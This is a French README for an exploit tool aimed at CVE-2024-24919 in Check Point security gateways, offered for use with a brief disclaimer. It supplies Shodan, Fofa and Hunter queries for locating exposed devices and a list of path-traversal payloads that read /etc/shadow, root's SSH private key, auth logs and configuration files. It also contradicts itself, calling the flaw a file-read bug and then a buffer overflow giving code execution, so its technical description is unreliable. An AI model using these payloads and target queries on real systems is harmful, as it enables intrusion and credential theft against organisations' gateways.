
CVE-2024-24919 exploit
Ce dépôt contient un outil pour exploiter la vulnérabilité CVE-2024-24919 dans les passerelles de sécurité Check Point. L'outil est un multi-scanner capable d'identifier les appareils vulnérables et un exploit mono-cible capable de prendre le contrôle total de l'appareil affecté.
CVE-2024-24919 est une vulnérabilité de divulgation d'informations de gravité élevée qui permet à un attaquant de lire à distance des fichiers arbitraires sur une passerelle de sécurité Check Point. Cette vulnérabilité peut être exploitée pour voler des informations sensibles, telles que des mots de passe et des fichiers de configuration.
Avertissement :
Cet outil est fourni à des fins éducatives uniquement. Il ne doit pas être utilisé pour attaquer des systèmes vulnérables sans le consentement explicite du propriétaire. Les auteurs de cet outil ne sont pas responsables des dommages pouvant résulter de son utilisation.
L'exploit fonctionne en envoyant une requête HTTP spécialement conçue à l'appareil vulnérable. La requête déclenche un débordement de tampon dans le firmware de l'appareil, ce qui permet à l'attaquant d'exécuter du code arbitraire. L'exploit peut ensuite être utilisé pour prendre le contrôle total de l'appareil.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
Vous pouvez scanner une seule cible ou plusieurs !
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Chemins de l'outil : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```